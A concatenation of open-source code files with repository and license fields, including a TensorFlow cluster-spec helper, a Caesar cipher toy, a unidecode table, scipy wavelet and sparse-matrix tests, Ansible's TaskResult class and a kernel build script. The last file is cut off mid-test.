cluster_spec=ParamServerClusterSpecString(num_workers,
num_param_servers,
port))
config += '---\n'
config += PARAM_SERVER_SVC.format(port=port,
param_server_id=param_server)
config += '---\n'
return config
def WorkerClusterSpecString(num_workers,
num_param_servers,
port):
"""Generates worker cluster spec."""
return ClusterSpecString(num_workers, num_param_servers, port)
def ParamServerClusterSpecString(num_workers,
num_param_servers,
port):
"""Generates parameter server spec."""
return ClusterSpecString(num_workers, num_param_servers, port)
def ClusterSpecString(num_workers,
num_param_servers,
port):
"""Generates general cluster spec."""
spec = 'worker|'
for worker in range(num_workers):
spec += 'tf-worker%d:%d' % (worker, port)
if worker != num_workers-1:
spec += ';'
spec += ',ps|'
for param_server in range(num_param_servers):
spec += 'tf-ps%d:%d' % (param_server, port)
if param_server != num_param_servers-1:
spec += ';'
return spec
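# For example, ClusterSpecString(2, 1, 2222) returns
# 'worker|tf-worker0:2222;tf-worker1:2222,ps|tf-ps0:2222'.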
if __name__ == '__main__':
main()
| apache-2.0 |
sahilqur/python_projects | Text/caesar_cipher.py | 15 | 1107 | """
Caesar Cipher - Enter the cipher number and the program will "encrypt" your text
with the Caesar cipher (a.k.a. ROT-N). Type the word "exit" when you're finished.
"""
while True:
try:
cipher = int(raw_input("Enter the cipher number: "))
break
except ValueError:
print "I need a valid integer, please."
print "Enter the text to be encoded."
print "Enter \"exit\" to leave."
if __name__ == '__main__':
while True:
text = raw_input("> ")
encoded = []
if text.lower() == "exit":
break
for letter in text:
if letter.isalpha():
is_upper = False
if letter == letter.upper():
is_upper = True
letter = letter.lower()
value = (ord(letter) - 97 + cipher) % 26
if is_upper:
value -= 32
encoded.append(chr(value + 97))
else:
encoded.append(letter)
print ''.join(encoded)
| mit |
zobe123/Plex-CS | lib/unidecode/x0d2.py | 253 | 4724 | data = (
'toels', # 0x00
'toelt', # 0x01
'toelp', # 0x02
'toelh', # 0x03
'toem', # 0x04
'toeb', # 0x05
'toebs', # 0x06
'toes', # 0x07
'toess', # 0x08
'toeng', # 0x09
'toej', # 0x0a
'toec', # 0x0b
'toek', # 0x0c
'toet', # 0x0d
'toep', # 0x0e
'toeh', # 0x0f
'tyo', # 0x10
'tyog', # 0x11
'tyogg', # 0x12
'tyogs', # 0x13
'tyon', # 0x14
'tyonj', # 0x15
'tyonh', # 0x16
'tyod', # 0x17
'tyol', # 0x18
'tyolg', # 0x19
'tyolm', # 0x1a
'tyolb', # 0x1b
'tyols', # 0x1c
'tyolt', # 0x1d
'tyolp', # 0x1e
'tyolh', # 0x1f
'tyom', # 0x20
'tyob', # 0x21
'tyobs', # 0x22
'tyos', # 0x23
'tyoss', # 0x24
'tyong', # 0x25
'tyoj', # 0x26
'tyoc', # 0x27
'tyok', # 0x28
'tyot', # 0x29
'tyop', # 0x2a
'tyoh', # 0x2b
'tu', # 0x2c
'tug', # 0x2d
'tugg', # 0x2e
'tugs', # 0x2f
'tun', # 0x30
'tunj', # 0x31
'tunh', # 0x32
'tud', # 0x33
'tul', # 0x34
'tulg', # 0x35
'tulm', # 0x36
'tulb', # 0x37
'tuls', # 0x38
'tult', # 0x39
'tulp', # 0x3a
'tulh', # 0x3b
'tum', # 0x3c
'tub', # 0x3d
'tubs', # 0x3e
'tus', # 0x3f
'tuss', # 0x40
'tung', # 0x41
'tuj', # 0x42
'tuc', # 0x43
'tuk', # 0x44
'tut', # 0x45
'tup', # 0x46
'tuh', # 0x47
'tweo', # 0x48
'tweog', # 0x49
'tweogg', # 0x4a
'tweogs', # 0x4b
'tweon', # 0x4c
'tweonj', # 0x4d
'tweonh', # 0x4e
'tweod', # 0x4f
'tweol', # 0x50
'tweolg', # 0x51
'tweolm', # 0x52
'tweolb', # 0x53
'tweols', # 0x54
'tweolt', # 0x55
'tweolp', # 0x56
'tweolh', # 0x57
'tweom', # 0x58
'tweob', # 0x59
'tweobs', # 0x5a
'tweos', # 0x5b
'tweoss', # 0x5c
'tweong', # 0x5d
'tweoj', # 0x5e
'tweoc', # 0x5f
'tweok', # 0x60
'tweot', # 0x61
'tweop', # 0x62
'tweoh', # 0x63
'twe', # 0x64
'tweg', # 0x65
'twegg', # 0x66
'twegs', # 0x67
'twen', # 0x68
'twenj', # 0x69
'twenh', # 0x6a
'twed', # 0x6b
'twel', # 0x6c
'twelg', # 0x6d
'twelm', # 0x6e
'twelb', # 0x6f
'twels', # 0x70
'twelt', # 0x71
'twelp', # 0x72
'twelh', # 0x73
'twem', # 0x74
'tweb', # 0x75
'twebs', # 0x76
'twes', # 0x77
'twess', # 0x78
'tweng', # 0x79
'twej', # 0x7a
'twec', # 0x7b
'twek', # 0x7c
'twet', # 0x7d
'twep', # 0x7e
'tweh', # 0x7f
'twi', # 0x80
'twig', # 0x81
'twigg', # 0x82
'twigs', # 0x83
'twin', # 0x84
'twinj', # 0x85
'twinh', # 0x86
'twid', # 0x87
'twil', # 0x88
'twilg', # 0x89
'twilm', # 0x8a
'twilb', # 0x8b
'twils', # 0x8c
'twilt', # 0x8d
'twilp', # 0x8e
'twilh', # 0x8f
'twim', # 0x90
'twib', # 0x91
'twibs', # 0x92
'twis', # 0x93
'twiss', # 0x94
'twing', # 0x95
'twij', # 0x96
'twic', # 0x97
'twik', # 0x98
'twit', # 0x99
'twip', # 0x9a
'twih', # 0x9b
'tyu', # 0x9c
'tyug', # 0x9d
'tyugg', # 0x9e
'tyugs', # 0x9f
'tyun', # 0xa0
'tyunj', # 0xa1
'tyunh', # 0xa2
'tyud', # 0xa3
'tyul', # 0xa4
'tyulg', # 0xa5
'tyulm', # 0xa6
'tyulb', # 0xa7
'tyuls', # 0xa8
'tyult', # 0xa9
'tyulp', # 0xaa
'tyulh', # 0xab
'tyum', # 0xac
'tyub', # 0xad
'tyubs', # 0xae
'tyus', # 0xaf
'tyuss', # 0xb0
'tyung', # 0xb1
'tyuj', # 0xb2
'tyuc', # 0xb3
'tyuk', # 0xb4
'tyut', # 0xb5
'tyup', # 0xb6
'tyuh', # 0xb7
'teu', # 0xb8
'teug', # 0xb9
'teugg', # 0xba
'teugs', # 0xbb
'teun', # 0xbc
'teunj', # 0xbd
'teunh', # 0xbe
'teud', # 0xbf
'teul', # 0xc0
'teulg', # 0xc1
'teulm', # 0xc2
'teulb', # 0xc3
'teuls', # 0xc4
'teult', # 0xc5
'teulp', # 0xc6
'teulh', # 0xc7
'teum', # 0xc8
'teub', # 0xc9
'teubs', # 0xca
'teus', # 0xcb
'teuss', # 0xcc
'teung', # 0xcd
'teuj', # 0xce
'teuc', # 0xcf
'teuk', # 0xd0
'teut', # 0xd1
'teup', # 0xd2
'teuh', # 0xd3
'tyi', # 0xd4
'tyig', # 0xd5
'tyigg', # 0xd6
'tyigs', # 0xd7
'tyin', # 0xd8
'tyinj', # 0xd9
'tyinh', # 0xda
'tyid', # 0xdb
'tyil', # 0xdc
'tyilg', # 0xdd
'tyilm', # 0xde
'tyilb', # 0xdf
'tyils', # 0xe0
'tyilt', # 0xe1
'tyilp', # 0xe2
'tyilh', # 0xe3
'tyim', # 0xe4
'tyib', # 0xe5
'tyibs', # 0xe6
'tyis', # 0xe7
'tyiss', # 0xe8
'tying', # 0xe9
'tyij', # 0xea
'tyic', # 0xeb
'tyik', # 0xec
'tyit', # 0xed
'tyip', # 0xee
'tyih', # 0xef
'ti', # 0xf0
'tig', # 0xf1
'tigg', # 0xf2
'tigs', # 0xf3
'tin', # 0xf4
'tinj', # 0xf5
'tinh', # 0xf6
'tid', # 0xf7
'til', # 0xf8
'tilg', # 0xf9
'tilm', # 0xfa
'tilb', # 0xfb
'tils', # 0xfc
'tilt', # 0xfd
'tilp', # 0xfe
'tilh', # 0xff
)
| gpl-3.0 |
vanpact/scipy | scipy/signal/tests/test_wavelets.py | 108 | 5273 | from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import TestCase, run_module_suite, assert_equal, \
assert_array_equal, assert_array_almost_equal, assert_array_less, assert_
from scipy._lib.six import xrange
from scipy.signal import wavelets
class TestWavelets(TestCase):
def test_qmf(self):
assert_array_equal(wavelets.qmf([1, 1]), [1, -1])
def test_daub(self):
for i in xrange(1, 15):
assert_equal(len(wavelets.daub(i)), i * 2)
def test_cascade(self):
for J in xrange(1, 7):
for i in xrange(1, 5):
lpcoef = wavelets.daub(i)
k = len(lpcoef)
x, phi, psi = wavelets.cascade(lpcoef, J)
assert_(len(x) == len(phi) == len(psi))
assert_equal(len(x), (k - 1) * 2 ** J)
def test_morlet(self):
x = wavelets.morlet(50, 4.1, complete=True)
y = wavelets.morlet(50, 4.1, complete=False)
# Test if complete and incomplete wavelet have same lengths:
assert_equal(len(x), len(y))
# Test if complete wavelet is less than incomplete wavelet:
assert_array_less(x, y)
x = wavelets.morlet(10, 50, complete=False)
y = wavelets.morlet(10, 50, complete=True)
# For large widths complete and incomplete wavelets should be
# identical within numerical precision:
assert_equal(x, y)
# miscellaneous tests:
x = np.array([1.73752399e-09 + 9.84327394e-25j,
6.49471756e-01 + 0.00000000e+00j,
1.73752399e-09 - 9.84327394e-25j])
y = wavelets.morlet(3, w=2, complete=True)
assert_array_almost_equal(x, y)
x = np.array([2.00947715e-09 + 9.84327394e-25j,
7.51125544e-01 + 0.00000000e+00j,
2.00947715e-09 - 9.84327394e-25j])
y = wavelets.morlet(3, w=2, complete=False)
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, s=4, complete=True)
y = wavelets.morlet(20000, s=8, complete=True)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, s=4, complete=False)
assert_array_almost_equal(y, x, decimal=2)
y = wavelets.morlet(20000, s=8, complete=False)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, w=3, s=5, complete=True)
y = wavelets.morlet(20000, w=3, s=10, complete=True)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, w=3, s=5, complete=False)
assert_array_almost_equal(y, x, decimal=2)
y = wavelets.morlet(20000, w=3, s=10, complete=False)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, w=7, s=10, complete=True)
y = wavelets.morlet(20000, w=7, s=20, complete=True)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
x = wavelets.morlet(10000, w=7, s=10, complete=False)
assert_array_almost_equal(x, y, decimal=2)
y = wavelets.morlet(20000, w=7, s=20, complete=False)[5000:15000]
assert_array_almost_equal(x, y, decimal=2)
def test_ricker(self):
w = wavelets.ricker(1.0, 1)
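        # With a single point and width a=1 the only sample sits at t=0, so it
        # equals the Ricker wavelet's peak amplitude 2 / (sqrt(3*a) * pi**0.25).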
expected = 2 / (np.sqrt(3 * 1.0) * (np.pi ** 0.25))
assert_array_equal(w, expected)
lengths = [5, 11, 15, 51, 101]
for length in lengths:
w = wavelets.ricker(length, 1.0)
assert_(len(w) == length)
max_loc = np.argmax(w)
assert_(max_loc == (length // 2))
points = 100
w = wavelets.ricker(points, 2.0)
half_vec = np.arange(0, points // 2)
#Wavelet should be symmetric
assert_array_almost_equal(w[half_vec], w[-(half_vec + 1)])
#Check zeros
aas = [5, 10, 15, 20, 30]
points = 99
for a in aas:
w = wavelets.ricker(points, a)
vec = np.arange(0, points) - (points - 1.0) / 2
exp_zero1 = np.argmin(np.abs(vec - a))
exp_zero2 = np.argmin(np.abs(vec + a))
assert_array_almost_equal(w[exp_zero1], 0)
assert_array_almost_equal(w[exp_zero2], 0)
def test_cwt(self):
widths = [1.0]
delta_wavelet = lambda s, t: np.array([1])
len_data = 100
test_data = np.sin(np.pi * np.arange(0, len_data) / 10.0)
#Test delta function input gives same data as output
cwt_dat = wavelets.cwt(test_data, delta_wavelet, widths)
assert_(cwt_dat.shape == (len(widths), len_data))
assert_array_almost_equal(test_data, cwt_dat.flatten())
#Check proper shape on output
widths = [1, 3, 4, 5, 10]
cwt_dat = wavelets.cwt(test_data, wavelets.ricker, widths)
assert_(cwt_dat.shape == (len(widths), len_data))
widths = [len_data * 10]
#Note: this wavelet isn't defined quite right, but is fine for this test
flat_wavelet = lambda l, w: np.ones(w) / w
cwt_dat = wavelets.cwt(test_data, flat_wavelet, widths)
assert_array_almost_equal(cwt_dat, np.mean(test_data))
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause |
janek-warchol/ansible | lib/ansible/executor/task_result.py | 130 | 2534 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.parsing import DataLoader
class TaskResult:
'''
    This class is responsible for interpreting the resulting data
from an executed task, and provides helper methods for determining
the result of a given task.
'''
def __init__(self, host, task, return_data):
self._host = host
self._task = task
if isinstance(return_data, dict):
self._result = return_data.copy()
else:
self._result = DataLoader().load(return_data)
def is_changed(self):
return self._check_key('changed')
def is_skipped(self):
if 'results' in self._result and self._task.loop:
flag = True
for res in self._result.get('results', []):
if isinstance(res, dict):
flag &= res.get('skipped', False)
return flag
else:
return self._result.get('skipped', False)
def is_failed(self):
if 'failed_when_result' in self._result or \
'results' in self._result and True in [True for x in self._result['results'] if 'failed_when_result' in x]:
return self._check_key('failed_when_result')
else:
return self._check_key('failed') or self._result.get('rc', 0) != 0
def is_unreachable(self):
return self._check_key('unreachable')
def _check_key(self, key):
if 'results' in self._result and self._task.loop:
flag = False
for res in self._result.get('results', []):
if isinstance(res, dict):
flag |= res.get(key, False)
return flag
else:
return self._result.get(key, False)
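# Minimal usage sketch (hypothetical; not part of Ansible, and runnable only
# where ansible is importable). A stub object stands in for a real Task -- only
# the ``loop`` attribute that TaskResult reads is provided -- and the
# return_data dict mimics a simple module result.
if __name__ == '__main__':
    class _StubTask(object):
        loop = None
    demo_result = TaskResult('localhost', _StubTask(), dict(changed=True, rc=0))
    print(demo_result.is_changed())  # True
    print(demo_result.is_failed())   # False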
| gpl-3.0 |
MH2033/VIPER_KERNEL_KK_D802 | scripts/build-all.py | 1474 | 10189 | #! /usr/bin/env python
# Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Build the kernel for all targets using the Android build environment.
#
# TODO: Accept arguments to indicate what to build.
import glob
from optparse import OptionParser
import subprocess
import errno
import os
import os.path
import re
import shutil
import sys
version = 'build-all.py, version 0.01'
build_dir = '../all-kernels'
make_command = ["vmlinux", "modules", "dtbs"]
make_env = os.environ
make_env.update({
'ARCH': 'arm',
'KCONFIG_NOTIMESTAMP': 'true' })
make_env.setdefault('CROSS_COMPILE', 'arm-none-linux-gnueabi-')
all_options = {}
def error(msg):
sys.stderr.write("error: %s\n" % msg)
def fail(msg):
"""Fail with a user-printed message"""
error(msg)
sys.exit(1)
def check_kernel():
"""Ensure that PWD is a kernel directory"""
if (not os.path.isfile('MAINTAINERS') or
not os.path.isfile('arch/arm/mach-msm/Kconfig')):
fail("This doesn't seem to be an MSM kernel dir")
def check_build():
"""Ensure that the build directory is present."""
if not os.path.isdir(build_dir):
try:
os.makedirs(build_dir)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
def update_config(file, str):
print 'Updating %s with \'%s\'\n' % (file, str)
defconfig = open(file, 'a')
defconfig.write(str + '\n')
defconfig.close()
def scan_configs():
"""Get the full list of defconfigs appropriate for this tree."""
names = {}
arch_pats = (
r'[fm]sm[0-9]*_defconfig',
r'apq*_defconfig',
r'qsd*_defconfig',
r'msmkrypton*_defconfig',
)
for p in arch_pats:
for n in glob.glob('arch/arm/configs/' + p):
names[os.path.basename(n)[:-10]] = n
return names
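# For example, with arch/arm/configs/msm8974_defconfig present in the tree,
# scan_configs() would return {'msm8974': 'arch/arm/configs/msm8974_defconfig'}
# (hypothetical defconfig name; the actual entries depend on the tree).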
class Builder:
def __init__(self, logname):
self.logname = logname
self.fd = open(logname, 'w')
def run(self, args):
devnull = open('/dev/null', 'r')
proc = subprocess.Popen(args, stdin=devnull,
env=make_env,
bufsize=0,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
count = 0
# for line in proc.stdout:
rawfd = proc.stdout.fileno()
while True:
line = os.read(rawfd, 1024)
if not line:
break
self.fd.write(line)
self.fd.flush()
if all_options.verbose:
sys.stdout.write(line)
sys.stdout.flush()
else:
for i in range(line.count('\n')):
count += 1
if count == 64:
count = 0
print
sys.stdout.write('.')
sys.stdout.flush()
print
result = proc.wait()
self.fd.close()
return result
failed_targets = []
def build(target):
dest_dir = os.path.join(build_dir, target)
log_name = '%s/log-%s.log' % (build_dir, target)
print 'Building %s in %s log %s' % (target, dest_dir, log_name)
if not os.path.isdir(dest_dir):
os.mkdir(dest_dir)
defconfig = 'arch/arm/configs/%s_defconfig' % target
dotconfig = '%s/.config' % dest_dir
savedefconfig = '%s/defconfig' % dest_dir
shutil.copyfile(defconfig, dotconfig)
staging_dir = 'install_staging'
modi_dir = '%s' % staging_dir
hdri_dir = '%s/usr' % staging_dir
shutil.rmtree(os.path.join(dest_dir, staging_dir), ignore_errors=True)
devnull = open('/dev/null', 'r')
subprocess.check_call(['make', 'O=%s' % dest_dir,
'%s_defconfig' % target], env=make_env, stdin=devnull)
devnull.close()
if not all_options.updateconfigs:
# Build targets can be dependent upon the completion of previous
# build targets, so build them one at a time.
cmd_line = ['make',
'INSTALL_HDR_PATH=%s' % hdri_dir,
'INSTALL_MOD_PATH=%s' % modi_dir,
'O=%s' % dest_dir]
build_targets = []
for c in make_command:
if re.match(r'^-{1,2}\w', c):
cmd_line.append(c)
else:
build_targets.append(c)
for t in build_targets:
build = Builder(log_name)
result = build.run(cmd_line + [t])
if result != 0:
if all_options.keep_going:
failed_targets.append(target)
fail_or_error = error
else:
fail_or_error = fail
fail_or_error("Failed to build %s, see %s" %
(target, build.logname))
# Copy the defconfig back.
if all_options.configs or all_options.updateconfigs:
devnull = open('/dev/null', 'r')
subprocess.check_call(['make', 'O=%s' % dest_dir,
'savedefconfig'], env=make_env, stdin=devnull)
devnull.close()
shutil.copyfile(savedefconfig, defconfig)
def build_many(allconf, targets):
print "Building %d target(s)" % len(targets)
for target in targets:
if all_options.updateconfigs:
update_config(allconf[target], all_options.updateconfigs)
build(target)
if failed_targets:
fail('\n '.join(["Failed targets:"] +
[target for target in failed_targets]))
def main():
global make_command
check_kernel()
check_build()
configs = scan_configs()
usage = ("""
%prog [options] all -- Build all targets
%prog [options] target target ... -- List specific targets
%prog [options] perf -- Build all perf targets
%prog [options] noperf -- Build all non-perf targets""")
parser = OptionParser(usage=usage, version=version)
parser.add_option('--configs', action='store_true',
dest='configs',
help="Copy configs back into tree")
parser.add_option('--list', action='store_true',
dest='list',
help='List available targets')
parser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='Output to stdout in addition to log file')
parser.add_option('--oldconfig', action='store_true',
dest='oldconfig',
help='Only process "make oldconfig"')
parser.add_option('--updateconfigs',
dest='updateconfigs',
help="Update defconfigs with provided option setting, "
"e.g. --updateconfigs=\'CONFIG_USE_THING=y\'")
parser.add_option('-j', '--jobs', type='int', dest="jobs",
help="Number of simultaneous jobs")
parser.add_option('-l', '--load-average', type='int',
dest='load_average',
help="Don't start multiple jobs unless load is below LOAD_AVERAGE")
parser.add_option('-k', '--keep-going', action='store_true',
dest='keep_going', default=False,
help="Keep building other targets if a target fails")
parser.add_option('-m', '--make-target', action='append',
help='Build the indicated make target (default: %s)' %
' '.join(make_command))
(options, args) = parser.parse_args()
global all_options
all_options = options
if options.list:
print "Available targets:"
for target in configs.keys():
print " %s" % target
sys.exit(0)
if options.oldconfig:
make_command = ["oldconfig"]
elif options.make_target:
make_command = options.make_target
if options.jobs:
make_command.append("-j%d" % options.jobs)
if options.load_average:
make_command.append("-l%d" % options.load_average)
if args == ['all']:
build_many(configs, configs.keys())
elif args == ['perf']:
targets = []
for t in configs.keys():
if "perf" in t:
targets.append(t)
build_many(configs, targets)
elif args == ['noperf']:
targets = []
for t in configs.keys():
if "perf" not in t:
targets.append(t)
build_many(configs, targets)
elif len(args) > 0:
targets = []
for t in args:
if t not in configs.keys():
parser.error("Target '%s' not one of %s" % (t, configs.keys()))
targets.append(t)
build_many(configs, targets)
else:
parser.error("Must specify a target to build, or 'all'")
if __name__ == "__main__":
main()
| gpl-2.0 |
ales-erjavec/scipy | scipy/sparse/tests/test_base.py | 22 | 151714 | #
# Authors: Travis Oliphant, Ed Schofield, Robert Cimrman, Nathan Bell, and others
""" Test functions for sparse matrices. Each class in the "Matrix class
based tests" section become subclasses of the classes in the "Generic
tests" section. This is done by the functions in the "Tailored base
class for generic tests" section.
"""
from __future__ import division, print_function, absolute_import
__usage__ = """
Build sparse:
python setup.py build
Run tests if scipy is installed:
python -c 'import scipy;scipy.sparse.test()'
Run tests if sparse is not installed:
python tests/test_base.py
"""
import warnings
import operator
import contextlib
import numpy as np
from scipy._lib.six import xrange, zip as izip
from numpy import (arange, zeros, array, dot, matrix, asmatrix, asarray,
vstack, ndarray, transpose, diag, kron, inf, conjugate,
int8, ComplexWarning, power)
import random
from numpy.testing import (assert_raises, assert_equal, assert_array_equal,
assert_array_almost_equal, assert_almost_equal, assert_,
dec, run_module_suite, assert_allclose)
import scipy.linalg
import scipy.sparse as sparse
from scipy.sparse import (csc_matrix, csr_matrix, dok_matrix,
coo_matrix, lil_matrix, dia_matrix, bsr_matrix,
eye, isspmatrix, SparseEfficiencyWarning, issparse)
from scipy.sparse.sputils import supported_dtypes, isscalarlike, get_index_dtype
from scipy.sparse.linalg import splu, expm, inv
from scipy._lib._version import NumpyVersion
from scipy._lib.decorator import decorator
import nose
# Check for __numpy_ufunc__
class _UFuncCheck(object):
def __array__(self):
return np.array([1])
def __numpy_ufunc__(self, *a, **kwargs):
global HAS_NUMPY_UFUNC
HAS_NUMPY_UFUNC = True
HAS_NUMPY_UFUNC = False
np.add(_UFuncCheck(), np.array([1]))
warnings.simplefilter('ignore', SparseEfficiencyWarning)
warnings.simplefilter('ignore', ComplexWarning)
def with_64bit_maxval_limit(maxval_limit=None, random=False, fixed_dtype=None,
downcast_maxval=None, assert_32bit=False):
"""
Monkeypatch the maxval threshold at which scipy.sparse switches to
64-bit index arrays, or make it (pseudo-)random.
"""
if maxval_limit is None:
maxval_limit = 10
if assert_32bit:
def new_get_index_dtype(arrays=(), maxval=None, check_contents=False):
tp = get_index_dtype(arrays, maxval, check_contents)
assert_equal(np.iinfo(tp).max, np.iinfo(np.int32).max)
assert_(tp == np.int32 or tp == np.intc)
return tp
elif fixed_dtype is not None:
def new_get_index_dtype(arrays=(), maxval=None, check_contents=False):
return fixed_dtype
elif random:
counter = np.random.RandomState(seed=1234)
def new_get_index_dtype(arrays=(), maxval=None, check_contents=False):
return (np.int32, np.int64)[counter.randint(2)]
else:
def new_get_index_dtype(arrays=(), maxval=None, check_contents=False):
dtype = np.int32
if maxval is not None:
if maxval > maxval_limit:
dtype = np.int64
for arr in arrays:
arr = np.asarray(arr)
if arr.dtype > np.int32:
if check_contents:
if arr.size == 0:
# a bigger type not needed
continue
elif np.issubdtype(arr.dtype, np.integer):
maxval = arr.max()
minval = arr.min()
if minval >= -maxval_limit and maxval <= maxval_limit:
# a bigger type not needed
continue
dtype = np.int64
return dtype
if downcast_maxval is not None:
def new_downcast_intp_index(arr):
if arr.max() > downcast_maxval:
raise AssertionError("downcast limited")
return arr.astype(np.intp)
@decorator
def deco(func, *a, **kw):
backup = []
modules = [scipy.sparse.bsr, scipy.sparse.coo, scipy.sparse.csc,
scipy.sparse.csr, scipy.sparse.dia, scipy.sparse.dok,
scipy.sparse.lil, scipy.sparse.sputils,
scipy.sparse.compressed, scipy.sparse.construct]
try:
for mod in modules:
backup.append((mod, 'get_index_dtype',
getattr(mod, 'get_index_dtype', None)))
setattr(mod, 'get_index_dtype', new_get_index_dtype)
if downcast_maxval is not None:
backup.append((mod, 'downcast_intp_index',
getattr(mod, 'downcast_intp_index', None)))
setattr(mod, 'downcast_intp_index', new_downcast_intp_index)
return func(*a, **kw)
finally:
for mod, name, oldfunc in backup:
if oldfunc is not None:
setattr(mod, name, oldfunc)
return deco
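# Usage sketch (hypothetical test, not part of this suite): decorating a test
# lowers the switchover threshold so the 64-bit index path is exercised on
# small matrices, e.g.
#
#     @with_64bit_maxval_limit(maxval_limit=5)
#     def test_index_dtype_switchover():
#         ...  # build matrices whose maxval exceeds 5 and expect int64 indices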
def todense(a):
if isinstance(a, np.ndarray) or isscalarlike(a):
return a
return a.todense()
class BinopTester(object):
# Custom type to test binary operations on sparse matrices.
def __add__(self, mat):
return "matrix on the right"
def __mul__(self, mat):
return "matrix on the right"
def __sub__(self, mat):
return "matrix on the right"
def __radd__(self, mat):
return "matrix on the left"
def __rmul__(self, mat):
return "matrix on the left"
def __rsub__(self, mat):
return "matrix on the left"
#------------------------------------------------------------------------------
# Generic tests
#------------------------------------------------------------------------------
# TODO check that spmatrix( ... , copy=X ) is respected
# TODO test prune
# TODO test has_sorted_indices
class _TestCommon:
"""test common functionality shared by all sparse formats"""
checked_dtypes = supported_dtypes
def __init__(self):
# Canonical data.
self.dat = matrix([[1,0,0,2],[3,0,1,0],[0,2,0,0]],'d')
self.datsp = self.spmatrix(self.dat)
# Some sparse and dense matrices with data for every supported
# dtype.
self.dat_dtypes = {}
self.datsp_dtypes = {}
for dtype in self.checked_dtypes:
self.dat_dtypes[dtype] = self.dat.astype(dtype)
self.datsp_dtypes[dtype] = self.spmatrix(self.dat.astype(dtype))
# Check that the original data is equivalent to the
# corresponding dat_dtypes & datsp_dtypes.
assert_equal(self.dat, self.dat_dtypes[np.float64])
assert_equal(self.datsp.todense(),
self.datsp_dtypes[np.float64].todense())
def test_bool(self):
def check(dtype):
datsp = self.datsp_dtypes[dtype]
assert_raises(ValueError, bool, datsp)
assert_(self.spmatrix([1]))
assert_(not self.spmatrix([0]))
for dtype in self.checked_dtypes:
fails = isinstance(self, TestDOK)
msg = "Cannot create a rank <= 2 DOK matrix."
yield dec.skipif(fails, msg)(check), dtype
def test_bool_rollover(self):
# bool's underlying dtype is 1 byte, check that it does not
# rollover True -> False at 256.
dat = np.matrix([[True, False]])
datsp = self.spmatrix(dat)
for _ in range(10):
datsp = datsp + datsp
dat = dat + dat
assert_array_equal(dat, datsp.todense())
def test_eq(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datbsr = bsr_matrix(dat)
datcsr = csr_matrix(dat)
datcsc = csc_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat == dat2, (datsp == datsp2).todense())
# mix sparse types
assert_array_equal(dat == dat2, (datbsr == datsp2).todense())
assert_array_equal(dat == dat2, (datcsr == datsp2).todense())
assert_array_equal(dat == dat2, (datcsc == datsp2).todense())
assert_array_equal(dat == dat2, (datlil == datsp2).todense())
# sparse/dense
assert_array_equal(dat == datsp2, datsp2 == dat)
# sparse/scalar
assert_array_equal(dat == 0, (datsp == 0).todense())
assert_array_equal(dat == 1, (datsp == 1).todense())
assert_array_equal(dat == np.nan, (datsp == np.nan).todense())
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_ne(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
